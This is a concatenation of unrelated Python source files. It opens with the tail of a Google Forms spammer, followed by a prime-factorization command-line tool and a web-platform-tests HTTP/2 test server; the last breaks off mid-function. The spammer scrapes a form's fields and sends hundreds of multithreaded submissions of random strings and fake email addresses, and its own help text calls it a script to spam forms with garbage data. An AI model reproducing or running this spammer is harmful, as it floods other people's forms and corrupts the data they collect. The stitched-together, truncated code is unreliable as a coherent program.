data_params = data_params.replace(old, new)
# Literal eval the string list
data_params_eval = ast.literal_eval(data_params)
response_data = data_params_eval[0][4]
# Create a new Field object for each field we come across
field = Field()
# Populate the attributes with the parsed field data
field.type = FieldType(data_params_eval[0][3])
field.name = data_params_eval[0][1]
field.id = response_data[0][0]
field.validation = len(response_data[0][4]) > 0
field.required = True if response_data[0][2] == "true" else False
field.has_choices = False
if len(response_data[0][1]) > 0:
choices = []
for raw_choice in response_data[0][1]:
choice = Choice()
choice.choice_name = raw_choice[0]
choices.append(choice)
field.has_choices = len(choices) > 0
field.choices = choices
fields.append(field)
return fields
def generate_post_data(self, data_length: int = 50) -> Dict[str, str]:
"""
A function to scrape the form to get all the required post data
Parameters:
data_length (int): The length of the garbage data that is sent
Returns:
post_data (Dict[str, str]): A dictionary of the post data
"""
post_data = {}
chars = string.ascii_letters + string.digits
scraped_form_data = self.scraped_data
# Gets the list of only required fields if you do not want to fill the whole form
if self.required_only:
scraped_form_data = [field for field in self.scraped_data if field.required]
for field in scraped_form_data:
# To support the date and time fields we must make a specific case for each
if field.type == FieldType.TIME:
post_data[f"entry.{field.id}_hour"] = f"{random.randint(0, 23):02d}"
post_data[f"entry.{field.id}_minute"] = f"{random.randint(0, 59):02d}"
elif field.type == FieldType.DATE:
post_data[f"entry.{field.id}_year"] = str(random.randint(2000, 2022))
post_data[f"entry.{field.id}_month"] = str(random.randint(1, 12))
post_data[f"entry.{field.id}_day"] = str(random.randint(1, 31))
else:
# Only field that has validation is the email fields if found
if field.validation:
email_providers = [
"yahoo.com",
"hotmail.com",
"outlook.net",
"gmail.com",
]
selected_choice = "".join(random.choice(chars) for _ in range(data_length)) + "@" + random.choice(email_providers)
elif field.has_choices:
selected_choice = random.choice(field.choices).choice_name
else:
selected_choice = "".join(
random.choice(chars) for _ in range(data_length)
)
post_data[f"entry.{field.id}"] = selected_choice
return post_data
def post_data(self) -> int:
"""
A function to post the data to the form
Returns:
response.status_code (int): An integer stating the HTTP status code of the response
"""
response = requests.post(self.form_url, params=self.generate_post_data())
return response.status_code
def threader(self) -> None:
"""
A function to be used as a target function in the threading
"""
while True:
_ = queue.get()
self.post_data()
queue.task_done()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="A script to spam Google Forms with garbage data")
parser.add_argument("-u", "--url", type=str, required=True, help="The url of the google form")
parser.add_argument("-o", "--required", type=bool, default=False, help="If you only want to fill in the required fields")
parser.add_argument("-r", "--requests", type=int, default=500, help="The amount of requests to execute")
parser.add_argument("-t", "--threads", type=int, default=50, help="The amount of threads to use")
args = parser.parse_args()
if args.url is None:
print(f"[bold #F04349][-] Invalid argument, supply a form url[/bold #F04349]")
exit(-1)
print("")
print("[bold #FC970F][~] Starting spammer...[/bold #FC970F]\n")
parameter_table = tabulate(
[
["URL", args.url],
["Requests", args.requests],
["Threads", args.threads],
["Required Fields", args.required],
],
tablefmt="pretty",
colalign=("center", "left"),
)
print(f"[bold #F2B44B]{parameter_table}[/bold #F2B44B]\n")
spammer = GoogleFormSpammer(args.url, args.required)
start = time.perf_counter()
queue = Queue()
for _ in range(args.threads):
worker = Thread(target=spammer.threader)
worker.daemon = True
worker.start()
for request_worker in range(args.requests):
queue.put(request_worker)
queue.join()
total_time = round(time.perf_counter() - start, 2)
req_per_sec = round(args.requests / total_time, 3)
print("[bold #07FA1C][=] Spammer finished![/bold #07FA1C]\n")
results_table = tabulate(
[
["Execution Time", f"{total_time}s"],
["Speed", f"{req_per_sec} req/s"]
],
tablefmt="pretty",
colalign=("center", "left"),
)
print(f"[bold #31EE42]{results_table}[/bold #31EE42]\n")
|
primefac.py
|
#! /usr/bin/env python
from __future__ import print_function, division
from threading import Timer
import _primefac
# Note that the multiprocing incurs relatively significant overhead.
# Only call this if n is proving difficult to factor.
def kill_procs(procs):
for p in procs:
p.terminate()
def multifactor(n, methods=(_primefac.pollardRho_brent, _primefac.pollard_pm1, _primefac.williams_pp1,
_primefac.ecm, _primefac.mpqs, _primefac.fermat, _primefac.factordb), verbose=False, timeout=59):
from multiprocessing import Process, Queue as mpQueue
from six.moves import xrange, reduce
import six
def factory(method, n, output):
try:
g = method(n)
except OverflowError:
return None
if g is not None:
output.put((g, str(method).split()[1]))
factors = mpQueue()
procs = [Process(target=factory, args=(m, n, factors)) for m in methods]
timer = Timer(timeout, kill_procs, [procs])
try:
timer.start()
for p in procs:
p.start()
(f, g) = factors.get()
for p in procs:
try:
p.terminate()
except:
pass
finally:
timer.cancel()
if verbose:
names = {"pollardRho_brent": "prb",
"pollard_pm1": "p-1",
"williams_pp1": "p+1"}
if g in names:
name = names[g]
else:
name = g
print("\033[1;31m" + name + "\033[;m", end=' ')
stdout.flush()
return f
'''
Obtains a complete factorization of n, yielding the prime factors as they are
obtained. If the user explicitly specifies a splitting method, use that method.
Otherwise,
1. Pull out small factors with trial division.
2. Do a few rounds of _primefac.pollard's Rho algorithm.
TODO: a few rounds of ECM by itself?
TODO: a certain amount of P-1?
3. Launch multifactor on the remainder. Multifactor has enough overhead that
we want to be fairly sure that rho isn't likely to yield new factors soon.
The default value of rho_rounds=42000 seems good for that but is probably
overkill.
'''
def primefac(n, trial_limit=1000, rho_rounds=42000, verbose=False,
methods=(_primefac.pollardRho_brent, _primefac.pollard_pm1, _primefac.williams_pp1, _primefac.ecm, _primefac.mpqs,
_primefac.fermat, _primefac.factordb), timeout=60):
from _primefac import isprime, isqrt, primegen
from six.moves import xrange, reduce
from random import randrange
import six
timeout = timeout - 1
if n < 2:
return
if isprime(n):
yield n
return
factors, nroot = [], isqrt(n)
# Note that we remove factors of 2 whether the user wants to or not.
for p in primegen():
if n % p == 0:
while n % p == 0:
yield p
n //= p
nroot = isqrt(n)
if isprime(n):
yield n
return
if p > nroot:
if n != 1:
yield n
return
if p >= trial_limit:
break
if isprime(n):
yield n
return
if rho_rounds == "inf":
factors = [n]
while len(factors) != 0:
n = min(factors)
factors.remove(n)
f = _primefac.pollardRho_brent(n)
if isprime(f):
yield f
else:
factors.append(f)
n //= f
if isprime(n):
yield n
else:
factors.append(n)
return
factors, difficult = [n], []
while len(factors) != 0:
rhocount = 0
n = factors.pop()
try:
g = n
while g == n:
x, c, g = randrange(1, n), randrange(1, n), 1
y = x
while g == 1:
if rhocount >= rho_rounds:
raise Exception
rhocount += 1
x = (x**2 + c) % n
y = (y**2 + c) % n
y = (y**2 + c) % n
g = gcd(x-y, n)
# We now have a nontrivial factor g of n. If we took too long to get here, we're actually at the except statement.
if isprime(g):
yield g
else:
factors.append(g)
n //= g
if isprime(n):
yield n
else:
factors.append(n)
except Exception:
difficult.append(n) # Factoring n took too long. We'll have multifactor chug on it.
factors = difficult
while len(factors) != 0:
n = min(factors)
factors.remove(n)
f = multifactor(n, methods=methods, verbose=verbose, timeout=timeout)
if isprime(f):
yield f
else:
factors.append(f)
n //= f
if isprime(n):
yield n
else:
factors.append(n)
def factorint(n, trial_limit=1000, rho_rounds=42000, methods=(_primefac.pollardRho_brent, _primefac.pollard_pm1, _primefac.williams_pp1, _primefac.ecm, _primefac.mpqs, _primefac.fermat, _primefac.factordb)):
out = {}
for p in primefac(n, trial_limit=trial_limit, rho_rounds=rho_rounds, methods=methods):
out[p] = out.get(p, 0) + 1
return out
usage = """
This is primefac-fork version 1.1.
USAGE:
primefac [-vs|-sv] [-v|--verbose] [-s|--summary] [-t=NUM] [-r=NUM]
[-m=[prb][,p-1][,p+1][,ecm][,mpqs][,fermat][,factordb]] rpn
"rpn" is evaluated using integer arithmetic. Each number that remains on
the stack after evaluation is then factored.
"-t" is the trial division limit. Default == 1000. Use "-t=inf" to use
trial division exclusively.
"-r" is the number of rounds of _primefac.pollard's rho algorithm to try before
calling a factor "difficult". Default == 42,000. Use "-r=inf" to use
_primefac.pollard's rho exclusively once the trial division is completed.
If verbosity is invoked, we indicate in the output which algorithm produced
which factors during the multifactor phase.
If the summary flag is absent, then output is identical to the output of the
GNU factor command, except possibly for the order of the factors and, if
verbosity has been turned on, the annotations indicating which algorithm
produced which factors.
If the summary flag is present, then output is modified by adding a single
newline between each item's output, before the first, and after the last.
Each item's output is also modified by printing a second line of data
summarizing the results by describing the number of decimal digits in the
input, the number of decimal digits in each prime factor, and the factors'
multiplicities. For example:
>>> user@computer:~$ primefac -s 24 ! 1 - 7 !
>>>
>>> 620448401733239439359999: 991459181683 625793187653
>>> Z24 = P12 x P12 = 625793187653 x 991459181683
>>>
>>> 5040: 2 2 2 2 3 3 5 7
>>> Z4 = P1^4 x P1^2 x P1 x P1 = 2^4 x 3^2 x 5 x 7
>>>
>>> user@computer:~$
Note that the primes in the summary lines are listed in strictly-increasing
order, regardless of the order in which they were found.
The single-character versions of the verbosity and summary flags may be
combined into a single flag, "-vs" or "-sv".
The "-m" flag controls what methods are run during the multifactor phase.
prb and ecm can be listed repeatedly to run multiple instances of these
methods; running multiple instances of p-1, p+1, or mpqs confers no benefit,
so repeated listings of those methods are ignored.
This program can also be imported into your Python scripts as a module.
DETAILS:
Factoring: 1. Trial divide using the primes <= the specified limit.
2. Run _primefac.pollard's rho algorithm on the remainder. Declare a
cofactor "difficult" if it survives more than the specified
number of rounds of rho.
3. Subject each remaining cofactor to five splitting methods in
parallel: _primefac.pollard's rho algorithm with Brent's improvement,
_primefac.pollard's p-1 method,
_primefac.williams' p+1 method,
the elliptic curve method,
the multiple-polynomial quadratic sieve,
the fermat's factorization method,
and search known factors using factordb.
Using the "verbose" option will cause primefac to report which of
the various splitting methods separated which factors in stage 3.
RPN: The acceptable binary operators are + - * / % **.
They all have the same meaning as they do in Python source code
--- i.e., they are addition, subtraction, multiplication, integer
division, remainder, and exponentiation.
The acceptable unary operators are ! #. They are the factorial
and primorial, respectively.
There are three aliases: x for *, xx for **, and p! for #.
You may enclose the RPN expression in quotes if you so desire.
PERFORMANCE:
CREDITS:
Not much of this code was mine from the start.
* The MPQS code was copied mostly verbatim from
https://codegolf.stackexchange.com/questions/8629/9088#9088
* The functions to manipulate points in the elliptic curve method were
copied from a reply to the Programming Praxis post at
http://programmingpraxis.com/2010/04/23/
""" # TODO performance, credits
def rpn(instr):
stack = []
for token in instr.split():
if set(token).issubset("1234567890L"):
stack.append(int(token.rstrip('L')))
elif len(token) > 1 and token[0] == '-' and set(token[1:]).issubset("1234567890L"):
stack.append(int(token))
elif token in ('+', '-', '*', '/', '%', '**', 'x', 'xx'): # binary operators
b = stack.pop()
a = stack.pop()
if token == '+':
res = a + b
elif token == '-':
res = a - b
elif token == '*':
res = a * b
elif token == 'x':
res = a * b
elif token == '/':
res = a / b
elif token == '%':
res = a % b
elif token == '**':
res = a ** b
elif token == 'xx':
res = a ** b
stack.append(res)
elif token in ('!', '#', 'p!'): # unary operators
a = stack.pop()
if token == '!':
res = listprod(xrange(1, a+1))
elif token == '#':
res = listprod(primes(a+1))
elif token == 'p!':
res = listprod(primes(a+1))
stack.append(res)
else:
raise Exception("Failed to evaluate RPN expression: not sure what to do with '{t}'.".format(t=token))
return [_primefac.mpz(i) for i in stack]
def main(argv):
from six.moves import xrange, reduce
import six
if len(argv) == 1:
sysexit(usage)
rpx, tr, rr, veb, su = [], 1000, 42000, False, False
ms = {"prb": _primefac.pollardRho_brent,
"p-1": _primefac.pollard_pm1,
"p+1": _primefac.williams_pp1,
"ecm": _primefac.ecm,
"mpqs": _primefac.mpqs,
"fermat": _primefac.fermat,
"factordb": _primefac.factordb}
methods = (_primefac.pollardRho_brent, _primefac.pollard_pm1, _primefac.williams_pp1, _primefac.ecm, _primefac.mpqs, _primefac.fermat, _primefac.factordb)
try:
for arg in argv[1:]:
if arg in ("-v", "--verbose"):
veb = True
elif arg in ("-s", "--summary"):
su = True
elif arg in ("-vs", "-sv"):
veb, su = True, True
elif arg[:3] == "-t=":
tr = "inf" if arg[3:] == "inf" else int(arg[3:]) # Maximum number for trial division
elif arg[:3] == "-r=":
rr = "inf" if arg[3:] == "inf" else int(arg[3:]) # Number of rho rounds before multifactor
elif arg[:3] == "-m=": # methods = tuple(ms[x] for x in arg[3:].split(',') if x in ms)
methods = []
for x in arg[3:].split(','):
if x in ms:
if x in ("p-1", "p+1", "mpqs") and ms[x] in methods:
continue
methods.append(ms[x])
else:
rpx.append(arg)
nums = rpn(' '.join(rpx))
except:
sysexit("Error while parsing arguments" + str(e))
if su:
print()
for n in nums:
print("%d: " % n, end='')
f = {}
for p in primefac(n, trial_limit=(n if tr == "inf" else tr),
rho_rounds=rr, verbose=veb, methods=methods):
f[p] = f.get(p, 0) + 1
print(p, end=' ')
stdout.flush()
assert _primefac.isprime(p) and n % p == 0, (n, p)
print()
if su:
print("Z%d = " % len(str(n)), end='')
outstr = ""
for p in sorted(f):
if f[p] == 1:
outstr += "P%d x " % len(str(p))
else:
outstr += "P%d^%d x " % (len(str(p)), f[p])
outstr = outstr[:-2] + " = "
for p in sorted(f):
if f[p] == 1:
outstr += " %d x" % p
else:
outstr += " %d^%d x" % (p, f[p])
print(outstr[:-2])
print()
'''
main(['p', '-s',
'1489576198567193874913874619387459183543154617315437135656']) only test
'''
# TODO timeout?
if __name__ == "__main__":
from sys import argv as arguments, stdout, exit as sysexit
main(arguments)
'''
Fun examples:
primefac -v 1489576198567193874913874619387459183543154617315437135656
On my system, the factor race is a bit unpredicatble on this number.
prb, ecm, p-1, and mpqs all show up reasonably often.
primefac -v 12956921851257164598146425167654345673426523793463
Z50 = P14 x P17 x P20 =
24007127617807 x 28050585032291527 x 19240648901716863967.
p-1 gets the P14 and p+1 gets the rest.
primefac -v 38 ! 1 +
--> Z45 = P23 x P23 = 14029308060317546154181 x 37280713718589679646221
The MPQS (almost always) gets this one.
Depending on the system running things,
this can take from 10 seconds to 3 minutes.
'''
|
server.py
|
from six.moves import BaseHTTPServer
import errno
import os
import socket
from six.moves.socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
from six import binary_type, text_type
import uuid
from collections import OrderedDict
from six.moves.queue import Queue
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded
from six.moves.urllib.parse import urlsplit, urlunsplit
from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException
from .constants import h2_headers
# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit would produce an exception that is silently caught
# in Python 2 but leads to HTTP 431 in Python 3, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
from six.moves import http_client
assert isinstance(getattr(http_client, '_MAXHEADERS'), int)
setattr(http_client, '_MAXHEADERS', 512)
"""
HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data had been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter(object):
def __init__(self, rules):
"""Object for rewriting the request path.
:param rules: Initial rules to add; a list of three item tuples
(method, input_path, output_path), defined as for
register()
"""
self.rules = {}
for rule in reversed(rules):
self.register(*rule)
self.logger = get_logger()
def register(self, methods, input_path, output_path):
"""Register a rewrite rule.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param input_path: Path to match for the initial request.
:param output_path: Path to replace the input path with in
the request.
"""
if isinstance(methods, (binary_type, text_type)):
methods = [methods]
self.rules[input_path] = (methods, output_path)
def rewrite(self, request_handler):
"""Rewrite the path in a BaseHTTPRequestHandler instance, if
it matches a rule.
:param request_handler: BaseHTTPRequestHandler for which to
rewrite the request.
"""
split_url = urlsplit(request_handler.path)
if split_url.path in self.rules:
methods, destination = self.rules[split_url.path]
if "*" in methods or request_handler.command in methods:
self.logger.debug("Rewriting request path %s to %s" %
(request_handler.path, destination))
new_url = list(split_url)
new_url[2] = destination
new_url = urlunsplit(new_url)
request_handler.path = new_url
class WebTestServer(ThreadingMixIn, BaseHTTPServer.HTTPServer):
allow_reuse_address = True
acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
request_queue_size = 2000
# Ensure that we don't hang on shutdown waiting for requests
daemon_threads = True
def __init__(self, server_address, request_handler_cls,
router, rewriter, bind_address,
config=None, use_ssl=False, key_file=None, certificate=None,
encrypt_after_connect=False, latency=None, http2=False, **kwargs):
"""Server for HTTP(s) Requests
:param server_address: tuple of (server_name, port)
:param request_handler_cls: BaseHTTPRequestHandler-like class to use for
handling requests.
:param router: Router instance to use for matching requests to handler
functions
:param rewriter: RequestRewriter-like instance to use for preprocessing
requests before they are routed
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param use_ssl: Boolean indicating whether the server should use SSL
:param key_file: Path to key file to use if SSL is enabled.
:param certificate: Path to certificate to use if SSL is enabled.
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param bind_address True to bind the server to both the IP address and
port specified in the server_address parameter.
False to bind the server only to the port in the
server_address parameter, but not to the address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
"""
self.router = router
self.rewriter = rewriter
self.scheme = "http2" if http2 else "https" if use_ssl else "http"
self.logger = get_logger()
self.latency = latency
if bind_address:
hostname_port = server_address
else:
hostname_port = ("",server_address[1])
#super doesn't work here because BaseHTTPServer.HTTPServer is old-style
BaseHTTPServer.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)
if config is not None:
Server.config = config
else:
self.logger.debug("Using default configuration")
with ConfigBuilder(browser_host=server_address[0],
ports={"http": [self.server_address[1]]}) as config:
assert config["ssl_config"] is None
Server.config = config
self.key_file = key_file
self.certificate = certificate
self.encrypt_after_connect = use_ssl and encrypt_after_connect
if use_ssl and not encrypt_after_connect:
if http2:
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
ssl_context.set_alpn_protocols(['h2'])
self.socket = ssl_context.wrap_socket(self.socket,
server_side=True)
else:
self.socket = ssl.wrap_socket(self.socket,
keyfile=self.key_file,
certfile=self.certificate,
server_side=True)
def handle_error(self, request, client_address):
error = sys.exc_info()[1]
if ((isinstance(error, socket.error) and
isinstance(error.args, tuple) and
error.args[0] in self.acceptable_errors) or
(isinstance(error, IOError) and
error.errno in self.acceptable_errors)):
pass # remote hang up before the result is sent
else:
self.logger.error(traceback.format_exc())
class BaseWebTestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
def __init__(self, *args, **kwargs):
self.logger = get_logger()
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def finish_handling_h1(self, request_line_is_valid):
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
self.finish_handling(request, response, handler)
def finish_handling(self, request, response, handler):
# If the handler we used for the request had a non-default base path
# set update the doc_root of the request to reflect this
if hasattr(handler, "base_path") and handler.base_path:
request.doc_root = handler.base_path
if hasattr(handler, "url_base") and handler.url_base != "/":
request.url_base = handler.url_base
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
self.logger.debug("No Handler found!")
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
response.set_error(e.code, e.message)
except Exception as e:
self.respond_with_error(response, e)
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
# If a python handler has been used, the old ones won't send a END_STR data frame, so this
# allows for backwards compatibility by accounting for these handlers that don't close streams
if isinstance(response, H2Response) and not response.writer.stream_ended:
response.writer.end_stream()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
def respond_with_error(self, response, e):
message = str(e)
if message:
err = [message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/2.0"
def handle_one_request(self):
"""
This is the main HTTP/2.0 Handler.
When a browser opens a connection to the server
on the HTTP/2.0 port, the server enters this which will initiate the h2 connection
and keep running throughout the duration of the interaction, and will read/write directly
from the socket.
Because there can be multiple H2 connections active at the same
time, a UUID is created for each so that it is easier to tell them apart in the logs.
"""
config = H2Configuration(client_side=False)
self.conn = H2ConnectionGuard(H2Connection(config=config))
self.close_connection = False
# Generate a UUID to make it easier to distinguish different H2 connection debug messages
self.uid = str(uuid.uuid4())[:8]
self.logger.debug('(%s) Initiating h2 Connection' % self.uid)
with self.conn as connection:
connection.initiate_connection()
data = connection.data_to_send()
window_size = connection.remote_settings.initial_window_size
self.request.sendall(data)
# Dict of { stream_id: (thread, queue) }
stream_queues = {}
try:
while not self.close_connection:
data = self.request.recv(window_size)
if data == '':
self.logger.debug('(%s) Socket Closed' % self.uid)
self.close_connection = True
continue
with self.conn as connection:
frames = connection.receive_data(data)
window_size = connection.remote_settings.initial_window_size
self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))
for frame in frames:
if isinstance(frame, ConnectionTerminated):
self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
self.close_connection = True
# Flood all the streams with connection terminated, this will cause them to stop
for stream_id, (thread, queue) in stream_queues.items():
queue.put(frame)
elif hasattr(frame, 'stream_id'):
if frame.stream_id not in stream_queues:
queue = Queue()
stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
stream_queues[frame.stream_id][1].put(frame)
if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
del stream_queues[frame.stream_id]
except (socket.timeout, socket.error) as e:
self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
if not self.close_connection:
self.close_connection = True
for stream_id, (thread, queue) in stream_queues.items():
queue.put(None)
except Exception as e:
self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
finally:
for stream_id, (thread, queue) in stream_queues.items():
thread.join()
def start_stream_thread(self, frame, queue):
"""
This starts a new thread to handle frames for a specific stream.
:param frame: The first frame on the stream
:param queue: A queue object that the thread will use to check for new frames
:return: The thread object that has already been started
"""
t = threading.Thread(
target=Http2WebTestRequestHandler._stream_thread,
args=(self, frame.stream_id, queue)
)
t.start()
return t
def _stream_thread(self, stream_id, queue):
"""
This thread processes frames for a specific stream. It waits for frames to be placed
in the queue, and processes them. When it receives a request frame, it will start processing
immediately, even if there are data frames to follow. One of the reasons for this is that it
can detect invalid requests before needing to read the rest of the frames.
"""
# The file-like pipe object that will be used to share data to request object if data is received
wfile = None
request = None
response = None
req_handler = None
while not self.close_connection:
# Wait for next frame, blocking
frame = queue.get(True, None)
self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))
if isinstance(frame, RequestReceived):
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')
stream_handler = H2HandlerCopy(self, frame, rfile)
stream_handler.server.rewriter.rewrite(stream_handler)
request = H2Request(stream_handler)
response = H2Response(stream_handler, request)
req_handler = stream_handler.server.router.get_handler(request)
if hasattr(req_handler, "frame_handler"):
# Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
req_handler = self.frame_handler(request, response, req_handler)
if hasattr(req_handler, 'handle_headers'):
req_handler.handle_headers(frame, request, response)
elif isinstance(frame, DataReceived):
wfile.write(frame.data)
if hasattr(req_handler, 'handle_data'):
req_handler.handle_data(frame, request, response)
if frame.stream_ended:
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
if request is not None:
request.frames.append(frame)
if hasattr(frame, "stream_ended") and frame.stream_ended:
self.finish_handling(request, response, req_handler)
def frame_handler(self, request, response, handler):
try:
return handler.frame_handler(request)
except HTTPException as e:
response.set_error(e.code, e.message)
response.write()
except Exception as e:
self.respond_with_error(response, e)
response.write()
class H2ConnectionGuard(object):
"""H2Connection objects are not threadsafe, so this keeps thread safety"""
lock = threading.Lock()
def __init__(self, obj):
assert isinstance(obj, H2Connection)
self.obj = obj
def __enter__(self):
self.lock.acquire()
return self.obj
def __exit__(self, exception_type, exception_value, traceback):
self.lock.release()
class H2Headers(dict):
def __init__(self, headers):
self.raw_headers = OrderedDict()
for key, val in headers:
self.raw_headers[key] = val
dict.__setitem__(self, self._convert_h2_header_to_h1(key), val)
def _convert_h2_header_to_h1(self, header_key):
if header_key[1:] in h2_headers and header_key[0] == ':':
return header_key[1:]
else:
return header_key
# TODO This does not seem relevant for H2 headers, so using a dummy function for now
def getallmatchingheaders(self, header):
return ['dummy function']
class H2HandlerCopy(object):
def __init__(self, handler, req_frame, rfile):
self.headers = H2Headers(req_frame.headers)
self.command = self.headers['method']
self.path = self.headers['path']
self.h2_stream_id = req_frame.stream_id
self.server = handler.server
self.protocol_version = handler.protocol_version
self.raw_requestline = ''
self.rfile = rfile
self.request = handler.request
self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.finish_handling_h1(request_line_is_valid)
except socket.timeout as e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
self.logger.error(err)
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except socket.error:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
class WebTestHttpd(object):
"""
:param host: Host from which to serve (default: 127.0.0.1)
:param port: Port from which to serve (default: 8000)
:param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
:param handler_cls: Class to use for the RequestHandler
:param use_ssl: Use a SSL server if no explicit server_cls is supplied
:param key_file: Path to key file to use if ssl is enabled
:param certificate: Path to certificate file to use if ssl is enabled
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param router_cls: Router class to use when matching URLs to handlers
:param doc_root: Document root for serving files
:param routes: List of routes with which to initialize the router
:param rewriter_cls: Class to use for request rewriter
:param rewrites: List of rewrites with which to initialize the rewriter_cls
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param bind_address: Boolean indicating whether to bind server to IP address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
HTTP server designed for testing scenarios.
Takes a router class which provides one method get_handler which takes a Request
and returns a handler function.
.. attribute:: host
The host name or ip address of the server
.. attribute:: port
The port on which the server is running
.. attribute:: router
The Router object used to associate requests with resources for this server
.. attribute:: rewriter
The Rewriter object used for URL rewriting
.. attribute:: use_ssl
Boolean indicating whether the server is using ssl
.. attribute:: started
Boolean indicating whether the server is running
"""
def __init__(self, host="127.0.0.1", port=8000,
server_cls=None, handler_cls=Http1WebTestRequestHandler,
use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
router_cls=Router, doc_root=os.curdir, routes=None,
rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
latency=None, config=None, http2=False):
if routes is None:
routes = default_routes.routes
self.host = host
self.router = router_cls(doc_root, routes)
self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])
self.use_ssl = use_ssl
self.http2 = http2
self.logger = get_logger()
if server_cls is None:
server_cls = WebTestServer
if use_ssl:
if not os.path.exists(key_file):
raise ValueError("SSL certificate not found: {}".format(key_file))
if not os.path.exists(certificate):
raise ValueError("SSL key not found: {}".format(certificate))
try:
self.httpd = server_cls((host, port),
handler_cls,
self.router,
self.rewriter,
config=config,
bind_address=bind_address,
use_ssl=use_ssl,
key_file=key_file,
certificate=certificate,
encrypt_after_connect=encrypt_after_connect,
latency=latency,
http2=http2)
self.started = False
_host, self.port = self.httpd.socket.getsockname()
except Exception:
self.logger.critical("Failed to start HTTP server on port %s; "
"is something already using that port?" % port)
raise
def start(self, block=False):
"""Start the server.
:param block: True to run the server on the current thread, blocking,
False to run on a separate thread."""
